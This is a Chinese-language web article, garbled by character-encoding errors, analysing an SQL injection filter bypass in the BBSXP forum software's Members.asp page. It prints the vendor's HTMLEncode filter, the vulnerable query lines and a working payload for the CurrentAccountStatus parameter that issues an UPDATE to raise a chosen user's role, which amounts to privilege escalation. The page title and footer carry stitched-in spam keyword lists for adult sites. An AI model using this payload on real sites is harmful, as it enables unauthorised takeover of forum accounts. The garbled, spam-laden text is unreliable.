精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 漏洞分析 查看內(nèi)容

BBSXP繞過過濾繼續(xù)注入漏洞分析

2022-9-27 15:29| 查看: 2254 |來源: 互聯(lián)網(wǎng)

漏洞分析: 官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Replace(fString,CHR(13),"") fString=Replace(fStri
漏洞分析:
官方最新過濾函數(shù)HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"
")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '過濾片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作為測試:
SearchType=HTMLEncode(Request("SearchType")) //第8行
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '獲取數(shù)據(jù)數(shù)量
//第54行

看個(gè)sql語句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
變量userid繞過過濾成功執(zhí)行了update
同理構(gòu)造:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
本文最后更新于 2022-9-27 15:29,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號(hào):w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 欧美一级在线观看视频 | 亚洲视频一区在线观看 | 国产成人在线视频观看 | 中文字幕久久久久久久系列 | 国产精品玩偶在线观看 | 黄色性一级片 | 成人免费视频一区二区 | 能免费看黄的网站 | 欧美成人午夜视频免看 | 一级做a爰片性色毛片中国 一级做a爰片性色毛片男 | 日韩毛片欧美一级国产毛片 | 国产亚洲精品片a77777 | 九九热中文字幕 | 亚洲最大成人综合网 | 日韩在线视频免费不卡一区 | 免费又色又爽1000禁片 | 丁香婷婷亚洲 | 另类图片第一页 | 亚洲综合色丁香麻豆 | 午夜精品久久久久久久爽 | 国产精品国产亚洲精品看不卡 | 快色网站 | 黄色看片网址 | 视频一区二区在线 | 成人黄色免费 | 看全大色黄大色黄大片一级爽 | 国模沟沟一区二区三区 | 亚洲精品一区二区三区在 | 精品视频一区二区三区在线观看 | 一级黄色免费片 | 99成人在线 | www.久久久| 一级在线观看视频 | 欧美综合国产精品日韩一 | 综合啪啪 | 综合亚洲欧美日韩一区二区 | 久久香蕉国产线看观看8青草 | 黄色三级a | 毛片96视频免费观看 | 日本韩国一级 | 一级黄色小视频 |